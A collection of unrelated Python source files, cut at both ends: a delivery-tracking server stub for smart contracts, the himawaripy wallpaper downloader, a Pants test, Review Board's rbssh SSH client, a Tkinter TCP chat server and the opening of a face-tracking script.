uint256"}],"name":"Approval","type":"event"}]')
def __init__(self, server_address, handler_class):
super(ScrapingHTTPServer, self).__init__(server_address, handler_class)
self.tracked_packages = {} # tracking number => smart contract
self.scheduler = sched.scheduler(time.time, time.sleep)
# scrape USPS once every SCRAPE_INTERVAL seconds, in a separate thread
self.scheduler.enter(self.SCRAPE_INTERVAL, 1, self._update_deliveries)
self.scraping_thread = Thread(target=self.scheduler.run)
self.scraping_thread.start()
def _update_deliveries(self):
print("Updating deliveries at time t=%s" %time.time())
delivered_packages = []
for package_number in self.tracked_packages:
if self._is_delivered(package_number):
self.tracked_packages[package_number].functions.verifyDelivery().call()
delivered_packages.append(package_number)
for package_number in delivered_packages:
del self.tracked_packages[package_number]
# schedule next update
self.scheduler.enter(self.SCRAPE_INTERVAL, 1, self._update_deliveries)
def _is_delivered(self, tracking_number):
# TODO: Add actual USPS site scraper. For now, flips a coin to determine delivery status :)
if random.random() > 0.5:
return True
return False
class Server(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
def do_HEAD(self):
self._set_headers()
def do_GET(self):
self._set_headers()
self.wfile.write(json.dumps({'remaining_deliveries': list(self.server.tracked_packages.keys())}).encode('utf-8'))
def do_POST(self):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
# refuse to receive non-json content
if ctype != 'application/json':
self.send_response(400)
self.end_headers()
return
# read the message and convert it into a python dictionary
length = int(self.headers.get('content-length'))
message = json.loads(self.rfile.read(length))
delivery_carrier = message['delivery_carrier']
tracking_number = message['tracking_number']
contract_address = message['contract_address']
# verify carrier
if delivery_carrier != 'USPS':
self.send_response(412)
self.end_headers()
return
# add the tracking number to the list of packages we track
self.server.tracked_packages[tracking_number] = w3.eth.contract(address=contract_address, abi=self.server.ERC20_ABI)
# send response
self._set_headers()
self.wfile.write(json.dumps({'received': 'ok'}).encode('utf-8'))
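# Example request handled by do_POST above (field names taken from the handler;
# the values are placeholders):
#   POST / HTTP/1.1
#   Content-Type: application/json
#
#   {"delivery_carrier": "USPS", "tracking_number": "<tracking number>",
#    "contract_address": "<contract address>"}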
def run(server_class=ScrapingHTTPServer, handler_class=Server, port=8008):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print('Starting httpd on port %d...' % port)
httpd.serve_forever()
if __name__ == "__main__":
from sys import argv
if len(argv) == 2:
run(port=int(argv[1]))
else:
run()
|
__main__.py
|
#!/usr/bin/env python3
import argparse
from datetime import timedelta, datetime
import io
import itertools as it
import json
import multiprocessing as mp
import multiprocessing.dummy as mp_dummy
import os
import os.path as path
import sys
from time import strptime, strftime, mktime
import urllib.request
from glob import iglob, glob
import threading
import time
import subprocess
import appdirs
from PIL import Image, ImageDraw
from dateutil.tz import tzlocal
from .utils import set_background, get_desktop_environment
# Semantic Versioning: Major, Minor, Patch
HIMAWARIPY_VERSION = (2, 1, 0)
counter = None
HEIGHT = 550
WIDTH = 550
def calculate_time_offset(latest_date, auto, preferred_offset):
if auto:
preferred_offset = int(datetime.now(tzlocal()).strftime("%z")[0:3])
print("Detected offset: UTC{:+03d}:00".format(preferred_offset))
if 11 >= preferred_offset > 10:
preferred_offset = 10
print("Offset is greater than +10, +10 will be used...")
elif 12 >= preferred_offset > 11:
preferred_offset = -12
print("Offset is greater than +10, -12 will be used...")
himawari_offset = 10 # UTC+10:00 is the time zone that himawari is over
offset = int(preferred_offset - himawari_offset)
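# Example: a preferred offset of UTC+02:00 gives offset = 2 - 10 = -8, so the
# image requested is the one from 8 hours before the latest timestamp.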
offset_tmp = datetime.fromtimestamp(mktime(latest_date)) + timedelta(hours=offset)
offset_time = offset_tmp.timetuple()
return offset_time
def download_chunk(args):
global counter
x, y, latest, level = args
url_format = "http://himawari8.nict.go.jp/img/D531106/{}d/{}/{}_{}_{}.png"
url = url_format.format(level, WIDTH, strftime("%Y/%m/%d/%H%M%S", latest), x, y)
tiledata = download(url)
# If the tile data is 2867 bytes, it is a blank "No Image" tile.
if tiledata.__sizeof__() == 2867:
sys.exit('No image available for {}.'.format(strftime("%Y/%m/%d %H:%M:%S", latest)))
with counter.get_lock():
counter.value += 1
if counter.value == level * level:
print("Downloading tiles: completed.")
else:
print("Downloading tiles: {}/{} completed...".format(counter.value, level * level))
return x, y, tiledata
def parse_args():
parser = argparse.ArgumentParser(description="set (near-realtime) picture of Earth as your desktop background",
epilog="http://labs.boramalper.org/himawaripy")
parser.add_argument("--version", action="version", version="%(prog)s {}.{}.{}".format(*HIMAWARIPY_VERSION))
group = parser.add_mutually_exclusive_group()
group.add_argument("--auto-offset", action="store_true", dest="auto_offset", default=False,
help="determine offset automatically")
group.add_argument("-o", "--offset", type=int, dest="offset", default=10,
help="UTC time offset in hours, must be less than or equal to +10")
parser.add_argument("-l", "--level", type=int, choices=[4, 8, 16, 20], dest="level", default=4,
help="increases the quality (and the size) of each tile. possible values are 4, 8, 16, 20")
parser.add_argument("-d", "--deadline", type=int, dest="deadline", default=6,
help="deadline in minutes to download all the tiles, set 0 to cancel")
parser.add_argument("--save-battery", action="store_true", dest="save_battery", default=False,
help="stop refreshing on battery")
parser.add_argument("--output-dir", type=str, dest="output_dir",
help="directory to save the temporary background image",
default=appdirs.user_cache_dir(appname="himawaripy", appauthor=False))
parser.add_argument("--dont-change", action="store_true", dest="dont_change", default=False,
help="don't change the wallpaper (just download it)")
parser.add_argument("-u", "--url", type=str, dest="direct_url", default=None,
help="direct url to load instead of himawari sattelite "
"(e.g. something from https://sdo.gsfc.nasa.gov/assets/img/latest")
parser.add_argument("-b", "--black_out_rect", type=str, dest="black_out_rect", default=None,
help="draw a black rectangle on some part of the image. Format: x1,x2,x3,x4 where (x1, x2)"
"and (x3, x4) are pixel coordinates of two corners of the rectangle.")
args = parser.parse_args()
if not -12 <= args.offset <= 10:
sys.exit("OFFSET has to be between -12 and +10!\n")
if not args.deadline >= 0:
sys.exit("DEADLINE has to be greater than (or equal to if you want to disable) zero!\n")
return args
def is_discharging():
if sys.platform.startswith("linux"):
if len(glob("/sys/class/power_supply/BAT*")) > 1:
print("Multiple batteries detected, using BAT0.")
with open("/sys/class/power_supply/BAT0/status") as f:
status = f.readline().strip()
return status == "Discharging"
elif sys.platform == 'darwin':
return b'discharging' in subprocess.check_output(["pmset", "-g", "batt"])
else:
sys.exit("Battery saving feature works only on linux or mac!\n")
def download(url):
exception = None
for i in range(1, 4): # retry max 3 times
try:
with urllib.request.urlopen(url) as response:
return response.read()
except Exception as e:
exception = e
print("[{}/3] Retrying to download '{}'...".format(i, url))
time.sleep(1)
pass
if exception:
raise exception
else:
sys.exit("Could not download '{}'!\n".format(url))
def download_image(url):
exception = None
for i in range(1, 4): # retry max 3 times
try:
with urllib.request.urlopen(url) as response:
return Image.open(response)
except Exception as e:
exception = e
print("[{}/3] Retrying to download '{}'...".format(i, url))
time.sleep(1)
pass
if exception:
raise exception
else:
sys.exit("Could not download '{}'!\n".format(url))
def download_himawari_image(level, offset=0, auto_offset=False, **_):
latest_json = download("http://himawari8-dl.nict.go.jp/himawari8/img/D531106/latest.json")
latest = strptime(json.loads(latest_json.decode("utf-8"))["date"], "%Y-%m-%d %H:%M:%S")
print("Latest version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", latest)))
requested_time = calculate_time_offset(latest, auto_offset, offset)
if auto_offset or offset != 10:
print("Offset version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", requested_time)))
png = Image.new("RGB", (WIDTH * level, HEIGHT * level))
p = mp_dummy.Pool(level * level)
print("Downloading tiles...")
res = p.map(download_chunk, it.product(range(level), range(level), (requested_time,), (level,)))
for (x, y, tiledata) in res:
tile = Image.open(io.BytesIO(tiledata))
png.paste(tile, (WIDTH * x, HEIGHT * y, WIDTH * (x + 1), HEIGHT * (y + 1)))
return png
def thread_main(args):
global counter
counter = mp.Value("i", 0)
print("Updating...")
if args.direct_url is None:
png = download_himawari_image(**args.__dict__)
else:
print(f"Attempting to download image from [{args.direct_url}]...")
png = download_image(args.direct_url).convert('RGB')
if args.black_out_rect is not None:
draw = ImageDraw.Draw(png)
coords = [int(c) for c in args.black_out_rect.split(',')]
draw.rectangle(coords, fill="black")
for file in iglob(path.join(args.output_dir, "himawari*.png")):
os.remove(file)
output_file = path.join(args.output_dir,
'himawaripy_{date:%Y-%m-%d_%H:%M:%S}.png'.format(date=datetime.now()))
print("Saving to '%s'..." % (output_file,))
os.makedirs(path.dirname(output_file), exist_ok=True)
png.save(output_file, "PNG")
if not args.dont_change:
r = set_background(output_file)
if not r:
sys.exit("Your desktop environment '{}' is not supported!\n".format(get_desktop_environment()))
else:
print("Not changing your wallpaper as requested.")
def main():
args = parse_args()
print("himawaripy {}.{}.{}".format(*HIMAWARIPY_VERSION))
if args.save_battery and is_discharging():
sys.exit("Discharging!\n")
print(f"args: {args}")
main_thread = threading.Thread(target=thread_main, args=(args,), name="himawaripy-main-thread", daemon=True)
main_thread.start()
main_thread.join(args.deadline * 60 if args.deadline else None)
if args.deadline and main_thread.is_alive():
sys.exit("Timeout!\n")
print()
sys.exit(0)
if __name__ == "__main__":
main()
|
test_run_tracker.py
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import http.server
import json
import threading
from builtins import open
from future.moves.urllib.parse import parse_qs
from pants.auth.cookies import Cookies
from pants.goal.run_tracker import RunTracker
from pants.util.contextutil import temporary_file_path
from pants_test.test_base import TestBase
class RunTrackerTest(TestBase):
def test_upload_stats(self):
stats = {'stats': {'foo': 'bar', 'baz': 42}}
class Handler(http.server.BaseHTTPRequestHandler):
def do_POST(handler):
try:
if handler.path.startswith('/redirect'):
code = int(handler.path[-3:])
handler.send_response(code)
handler.send_header('location', mk_url('/upload'))
handler.end_headers()
else:
self.assertEqual('/upload', handler.path)
self.assertEqual('application/x-www-form-urlencoded', handler.headers['Content-type'])
length = int(handler.headers['Content-Length'])
post_data = parse_qs(handler.rfile.read(length).decode('utf-8'))
decoded_post_data = {k: json.loads(v[0]) for k, v in post_data.items()}
self.assertEqual(stats, decoded_post_data)
handler.send_response(200)
except Exception:
handler.send_response(400) # Ensure the main thread knows the test failed.
raise
server_address = ('', 0)
server = http.server.HTTPServer(server_address, Handler)
host, port = server.server_address
def mk_url(path):
return 'http://{}:{}{}'.format(host, port, path)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
self.context(for_subsystems=[Cookies])
self.assertTrue(RunTracker.post_stats(mk_url('/upload'), stats))
self.assertTrue(RunTracker.post_stats(mk_url('/redirect307'), stats))
self.assertFalse(RunTracker.post_stats(mk_url('/redirect302'), stats))
server.shutdown()
server.server_close()
def test_write_stats_to_json_file(self):
# Set up
stats = {'stats': {'foo': 'bar', 'baz': 42}}
# Execute & verify
with temporary_file_path() as file_name:
self.assertTrue(RunTracker.write_stats_to_json(file_name, stats))
with open(file_name, 'r') as f:
result = json.load(f)
self.assertEqual(stats, result)
def test_create_dict_with_nested_keys_and_val(self):
keys = []
with self.assertRaises(ValueError):
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something')
keys += ['one']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': 'something'}
)
keys += ['two']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': 'something'}}
)
keys += ['three']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': 'something'}}}
)
keys += ['four']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': {'four': 'something'}}}}
)
def test_merge_list_of_keys_into_dict(self):
data = {}
keys = []
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something')
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', -1)
keys = ['key']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', 1)
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'O-N-E')
self.assertEqual(data, {'a': 'O-N-E'})
keys = ['one', 'two', 'three']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'T-H-R-E-E')
self.assertEqual(data, {'one': {'two': {'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A')
self.assertEqual(data, {'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['c', 'd', 'e', 'f']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'F-O-U-R')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['one', 'two', 'x', 'y']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'W-H-Y')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['c', 'd', 'e', 'g', 'h']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'H-E-L-L-O')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['one', 'two', 'x', 'z']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'Z-E-D')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['c', 'd', 'e', 'g', 'i']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'E-Y-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new O-N-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A-L-A')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A-L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a', 'b', 'c']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new A')
|
rbssh.py
|
#!/usr/bin/env python
#
# rbssh.py -- A custom SSH client for use in Review Board.
#
# This is used as an ssh replacement that can be used across platforms with
# a custom .ssh directory. OpenSSH doesn't respect $HOME, instead reading
# /etc/passwd directly, which causes problems for us. Using rbssh, we can
# work around this.
#
#
# Copyright (c) 2010-2011 Beanbag, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import getpass
import logging
import os
import select
import sys
import warnings
from optparse import OptionParser
# We don't want any warnings to end up impacting output.
warnings.simplefilter('ignore')
if str('RBSITE_PYTHONPATH') in os.environ:
for path in reversed(os.environ[str('RBSITE_PYTHONPATH')].split(str(':'))):
sys.path.insert(1, path)
os.environ[str('DJANGO_SETTINGS_MODULE')] = \
str('reviewboard.cmdline.conf.rbssh.settings')
import django
import paramiko
from django.utils import six
import reviewboard
from reviewboard import get_version_string
DEBUG = os.getenv('RBSSH_DEBUG') or os.getenv('DEBUG_RBSSH')
DEBUG_LOGDIR = os.getenv('RBSSH_LOG_DIR')
STORAGE_BACKEND = os.getenv('RBSSH_STORAGE_BACKEND')
SSH_PORT = 22
options = None
if DEBUG:
debug = logging.debug
else:
debug = lambda *args, **kwargs: None
class PlatformHandler(object):
"""A generic base class for wrapping platform-specific operations.
This should be subclassed for each major platform.
"""
def __init__(self, channel):
"""Initialize the handler."""
self.channel = channel
if six.PY3:
self.write_stdout = sys.stdout.buffer.write
self.write_stderr = sys.stderr.buffer.write
else:
self.write_stdout = sys.stdout.write
self.write_stderr = sys.stderr.write
def shell(self):
"""Open a shell."""
raise NotImplementedError
def transfer(self):
"""Transfer data over the channel."""
raise NotImplementedError
def process_channel(self, channel):
"""Process the given channel."""
if channel.closed:
return False
debug('!! process_channel\n')
if channel.recv_ready():
data = channel.recv(4096)
if not data:
debug('!! stdout empty\n')
return False
self.write_stdout(data)
sys.stdout.flush()
if channel.recv_stderr_ready():
data = channel.recv_stderr(4096)
if not data:
debug('!! stderr empty\n')
return False
self.write_stderr(data)
sys.stderr.flush()
if channel.exit_status_ready():
debug('!!! exit_status_ready\n')
return False
return True
def process_stdin(self, channel):
"""Read data from stdin and send it over the channel."""
debug('!! process_stdin\n')
try:
buf = os.read(sys.stdin.fileno(), 1)
except OSError:
buf = None
if not buf:
debug('!! stdin empty\n')
return False
channel.send(buf)
return True
class PosixHandler(PlatformHandler):
"""A platform handler for POSIX-type platforms."""
def shell(self):
"""Open a shell."""
import termios
import tty
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
self.handle_communications()
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def transfer(self):
"""Transfer data over the channel."""
import fcntl
fd = sys.stdin.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
self.handle_communications()
def handle_communications(self):
"""Handle any pending data over the channel or stdin."""
while True:
rl, wl, el = select.select([self.channel, sys.stdin], [], [])
if self.channel in rl:
if not self.process_channel(self.channel):
break
if sys.stdin in rl:
if not self.process_stdin(self.channel):
self.channel.shutdown_write()
break
class WindowsHandler(PlatformHandler):
"""A platform handler for Microsoft Windows platforms."""
def shell(self):
"""Open a shell."""
self.handle_communications()
def transfer(self):
"""Transfer data over the channel."""
self.handle_communications()
def handle_communications(self):
"""Handle any pending data over the channel or stdin."""
import threading
debug('!! begin_windows_transfer\n')
self.channel.setblocking(0)
def writeall(channel):
while self.process_channel(channel):
pass
debug('!! Shutting down reading\n')
channel.shutdown_read()
writer = threading.Thread(target=writeall, args=(self.channel,))
writer.start()
try:
while self.process_stdin(self.channel):
pass
except EOFError:
pass
debug('!! Shutting down writing\n')
self.channel.shutdown_write()
def print_version(option, opt, value, parser):
"""Print the current version and exit."""
parser.print_version()
sys.exit(0)
def parse_options(args):
"""Parse the given arguments into the global ``options`` dictionary."""
global options
hostname = None
# NOTE: Update to use RBProgVersionAction when this is ported to argparse.
parser = OptionParser(
usage='%prog [options] [user@]hostname [command]',
version=(
'%%prog %s\n'
'Python %s\n'
'Installed to %s'
% (get_version_string(),
sys.version.splitlines()[0],
os.path.dirname(reviewboard.__file__))
))
parser.disable_interspersed_args()
parser.add_option('-l',
dest='username', metavar='USERNAME', default=None,
help='the user to log in as on the remote machine')
parser.add_option('-p', '--port',
type='int', dest='port', metavar='PORT', default=None,
help='the port to connect to')
parser.add_option('-q', '--quiet',
action='store_true', dest='quiet', default=False,
help='suppress any unnecessary output')
parser.add_option('-s',
dest='subsystem', metavar='SUBSYSTEM', default=None,
nargs=2,
help='the subsystem to use (ssh or sftp)')
parser.add_option('-V',
action='callback', callback=print_version,
help='display the version information and exit')
parser.add_option('--rb-disallow-agent',
action='store_false', dest='allow_agent',
default=os.getenv('RBSSH_ALLOW_AGENT') != '0',
help='disable using the SSH agent for authentication')
parser.add_option('--rb-local-site',
dest='local_site_name', metavar='NAME',
default=os.getenv('RB_LOCAL_SITE'),
help='the local site name containing the SSH keys to '
'use')
(options, args) = parser.parse_args(args)
if options.subsystem:
if len(options.subsystem) != 2:
parser.error('-s requires a hostname and a valid subsystem')
elif options.subsystem[1] not in ('sftp', 'ssh'):
parser.error('Invalid subsystem %s' % options.subsystem[1])
hostname, options.subsystem = options.subsystem
if len(args) == 0 and not hostname:
parser.print_help()
sys.exit(1)
if not hostname:
hostname = args[0]
args = args[1:]
if options.port:
port = options.port
else:
port = SSH_PORT
return hostname, port, args
def main():
"""Run the application."""
if DEBUG:
pid = os.getpid()
log_filename = 'rbssh-%s.log' % pid
if DEBUG_LOGDIR:
log_path = os.path.join(DEBUG_LOGDIR, log_filename)
else:
log_path = log_filename
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-18s %(levelname)-8s '
'%(message)s',
datefmt='%m-%d %H:%M',
filename=log_path,
filemode='w')
debug('%s', sys.argv)
debug('PID %s', pid)
# Ensure we've patched Djblets for Python 3.10 + Django 1.11 compatibility.
# This can be removed once we've moved onto a modern version of Django.
import djblets
# Perform the bare minimum to initialize the Django/Review Board
# environment. We're not calling Review Board's initialize() because
# we want to completely minimize what we import and set up.
if hasattr(django, 'setup'):
django.setup()
from reviewboard.scmtools.core import SCMTool
from reviewboard.ssh.client import SSHClient
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
ch.setFormatter(logging.Formatter('%(message)s'))
ch.addFilter(logging.Filter('root'))
logging.getLogger('').addHandler(ch)
path, port, command = parse_options(sys.argv[1:])
if '://' not in path:
path = 'ssh://' + path
username, hostname = SCMTool.get_auth_from_uri(path, options.username)
if username is None:
username = getpass.getuser()
client = SSHClient(namespace=options.local_site_name,
storage_backend=STORAGE_BACKEND)
client.set_missing_host_key_policy(paramiko.WarningPolicy())
if command:
purpose = command
else:
purpose = 'interactive shell'
debug('!!! SSH backend = %s', type(client.storage))
debug('!!! Preparing to connect to %s@%s for %s',
username, hostname, purpose)
attempts = 0
password = None
key = client.get_user_key()
while True:
try:
client.connect(hostname, port, username=username,
password=password, pkey=key,
allow_agent=options.allow_agent)
break
except paramiko.AuthenticationException as e:
if attempts == 3 or not sys.stdin.isatty():
logging.error('Too many authentication failures for %s' %
username)
sys.exit(1)
attempts += 1
password = getpass.getpass("%s@%s's password: " %
(username, hostname))
except paramiko.SSHException as e:
logging.error('Error connecting to server: %s' % e)
sys.exit(1)
except Exception as e:
logging.error('Unknown exception during connect: %s (%s)' %
(e, type(e)))
sys.exit(1)
transport = client.get_transport()
channel = transport.open_session()
if sys.platform in ('cygwin', 'win32'):
debug('!!! Using WindowsHandler')
handler = WindowsHandler(channel)
else:
debug('!!! Using PosixHandler')
handler = PosixHandler(channel)
if options.subsystem == 'sftp':
debug('!!! Invoking sftp subsystem')
channel.invoke_subsystem('sftp')
handler.transfer()
elif command:
debug('!!! Sending command %s', command)
channel.exec_command(' '.join(command))
handler.transfer()
else:
debug('!!! Opening shell')
channel.get_pty()
channel.invoke_shell()
handler.shell()
debug('!!! Done')
status = channel.recv_exit_status()
client.close()
return status
if __name__ == '__main__':
main()
# ... with blackjack, and hookers.
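# Illustrative sketch (an assumption, not part of rbssh itself): one way this
# script can be invoked, matching the usage string declared in parse_options()
# above. The wrapper below is hypothetical and never called.
def _example_invocation():
    import subprocess
    # Run a single command on a remote host through rbssh.
    return subprocess.call(['rbssh', '-p', '22', 'user@example.com', 'true'])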
|
TCPserver.py
|
from socket import *
import tkinter as tk
import tkinter.scrolledtext as tst
import time
import tkinter.messagebox
import threading
class Application(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self,master)
self.grid()
self.createWidgets()
def createWidgets(self):
        # Chat display window
self.textEdit=tst.ScrolledText(self,width=50,height=15)
self.textEdit.grid(row=0,column=0,rowspan=1,columnspan=4)
        # Define tags to change the font colour
self.textEdit.tag_config('server',foreground='red')
self.textEdit.tag_config('guest',foreground='blue')
        # Message input window
self.inputText=tk.Text(self,width=40,height=5)
self.inputText.grid(row=1,column=0,columnspan=1)
        # Bind a shortcut so that pressing Enter sends the message
self.inputText.bind("<KeyPress-Return>",self.textSendReturn)
        # Send button
self.btnSend=tk.Button(self,text='send',command=self.textSend)
self.btnSend.grid(row=1,column=3)
        # Start a thread that receives messages and shows them in the chat window
t=threading.Thread(target=self.getInfo)
t.start()
def textSend(self):
        # Get the entire contents of the Text widget
str=self.inputText.get('1.0','end-1c')
if str!="" :
            # Show the send time and the outgoing message
timemsg='服务端'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime())+'\n'
self.textEdit.config(state='normal')
self.textEdit.insert(tk.END,timemsg,'server')
self.textEdit.insert(tk.END,str+'\n')
            # Scroll to the end so the newest message is visible
self.textEdit.see(tk.END)
self.textEdit.config(state='disabled')
            self.inputText.delete(0.0,tk.END) # Clear the contents of the input box
            # Send the data over the TCP connection
sendMessage=bytes(str,encoding='utf8')
            # Unlike UDP, send() is used without specifying an address and port, because a TCP connection is already established
connectionSocket.send(sendMessage)
else:
tk.messagebox.showinfo('警告',"不能发送空白信息!")
def getInfo(self):
while True:
recMsg=connectionSocket.recv(1024).decode("utf-8")+'\n'
revTime='客户端'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime())+'\n'
            # Set the state attribute to make textEdit editable
self.textEdit.config(state='normal')
self.textEdit.insert(tk.END,revTime,'guest')
self.textEdit.insert(tk.END,recMsg)
            # Scroll to the end so the newest message is visible
self.textEdit.see(tk.END)
            # Set the state attribute to make textEdit read-only again
self.textEdit.config(state='disabled')
def textSendReturn(self,event):
if event.keysym=="Return":
self.textSend()
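# Illustrative sketch (not part of the original script): a minimal client
# counterpart for the server set up below, using the same port (12000) and
# UTF-8 encoding. The function name is hypothetical and it is never called here.
def _example_client(server_ip='127.0.0.1'):
    clientSocket = socket(AF_INET, SOCK_STREAM)
    clientSocket.connect((server_ip, 12000))
    clientSocket.send('hello'.encode('utf8'))
    reply = clientSocket.recv(1024).decode('utf-8')
    clientSocket.close()
    return reply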
root=tk.Tk()
root.title('服务端')
# Port used by the server
serverPort=12000
serverSocket=socket(AF_INET,SOCK_STREAM)
# Bind the port
serverSocket.bind(('',serverPort))
# Maximum number of queued connections (backlog)
serverSocket.listen(1)
print('等待连接....')
# Accept an incoming request and establish a connection
connectionSocket,addr=serverSocket.accept()
print('一个连接')
app=Application(master=root)
app.mainloop()
|
detect_tracking_recognize.py
|
# Copyright (c) 2017 InspiRED Robotics
# The project was based on David Sandberg's implementation of facenet
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from scipy import misc
import sys
import os
import argparse
import tensorflow as tf
import numpy as np
import facenet
import align.detect_face
import random
from time import sleep
import math
from sklearn.externals import joblib
import time
import dlib
import imageio
from multiprocessing import Process, Pipe, Lock
import threading
def main(args):
# Store some git revision info in a text file in the log directory
# facenet.store_revision_info(src_path, output_dir, ' '.join(sys.argv))
detector = dlib.get_frontal_face_detector()
print('Creating networks and loading parameters')
# Load extracting feature model
print('Model directory: %s' % args.model_dir)
#Video information
trackers = []
positions = dlib.rectangles()
tracker = dlib.correlation_tracker()
vid = imageio.get_reader(args.input_video, 'ffmpeg')
win = dlib.image_window()
nums=range(40,vid.get_length())
#Multi Process Info
proc = None
nrof_person = 0
parent_conn, child_conn = Pipe()
#Detection Interval
interval = 20
##SVM model to predict images
